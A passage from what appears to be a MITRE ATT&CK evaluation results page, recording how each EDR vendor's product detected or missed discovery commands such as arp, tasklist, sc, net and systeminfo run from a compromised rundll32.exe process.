The capability enriched the execution of ipconfig.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Tainted)
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Enrichment
The capability enriched arp.exe with a related ATT&CK Technique (T1018 - Remote System Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed cmd.exe executing arp.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because arp was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran arp) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed arp.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing arp.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that arp.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched arp.exe with an alert for Arp Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running arp) has been tagged for monitoring because its parent process has a detection (cmd.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched arp.exe indicating its usage can be a sign of reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched the arp.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that the contents of the local ARP cache table was viewed. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe executing arp.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
The capability enriched the execution of arp.exe as possible reconnaissance as well as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched arp.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing arp.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing echo with command-line arguments. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran echo) were considered tainted. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because echo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing echo with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that echo was one of the commands used to enumerate the current username. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry showed the use of echo with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Telemetry
Telemetry showed cmd.exe executing the echo command. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the echo command) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running echo) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing the echo command. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched the cmd.exe echo command with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery) and a suspicious indicator that the command tried to identify the user on the system. [1] [2] [3] [4] [5] [6] [7]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing echo with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched cmd.exe executing echo with the correct ATT&CK Technique (System Owner / User Discovery). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed cmd.exe executing echo with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Enrichment
The capability enriched tasklist.exe with the correct ATT&CK Technique (T1057 - Process Discovery). [1] [2] [3] [4]
Telemetry
Telemetry within the process tree showed cmd.exe executing tasklist.exe with command-line arguments. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran tasklist) were considered tainted. [1] [2] [3] [4] [5]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because tasklist was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing tasklist.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that tasklist was one of the commands used to enumerate current running processes. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5]
Enrichment
The capability enriched tasklist.exe with an alert for Tasklist Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running tasklist) has been tagged for monitoring because its parent process has a detection (cmd.exe). [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing tasklist) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed cmd.exe executing tasklist.exe along with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5]
Enrichment
The capability enriched tasklist.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Service Discovery) and a suspicious indicator that the process discovered running Windows services and/or processes. [1] [2] [3] [4] [5]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed the execution sequence of cmd.exe executing tasklist.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of tasklist.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched tasklist.exe executing with a related ATT&CK Technique (System Information Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Enrichment
The capability enriched sc.exe with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the process tree showed cmd.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because sc query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran sc) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Enrichment (Tainted)
The capability enriched cmd.exe executing sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry showed cmd.exe executing sc with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing sc.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that sc was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running sc) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing sc with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing sc.exe with command-line arguments and enriched the command with the condition SC Query Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Tainted)
The capability enriched cmd.exe executing net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that net was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the net) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that Windows service was manipulated via sc.exe/net.exe tool. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing systeminfo.exe. [1] [2] [3] [4]
Enrichment
The capability enriched systeminfo.exe with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran systeminfo) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because systeminfo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating systeminfo execution was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Enrichment (Tainted)
The capability enriched systeminfo.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Telemetry
Telemetry showed cmd.exe executing systeminfo with command-line arguments. [1] [2] [3] [4]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing systeminfo.exe (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified systeminfo as a reconnaissance command used to obtain details from the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched systeminfo.exe with an alert for Systeminfo Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running systeminfo) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched systeminfo.exe indicating it could be used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2]
McAfee
Enrichment
The capability enriched systeminfo.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) and a suspicious indicator that system configuration info was queried. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe running systeminfo.exe. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of systeminfo.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched cmd.exe executing systeminfo with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed cmd.exe executing systeminfo.exe. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net config was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4]
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Config Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net config as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the net) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior
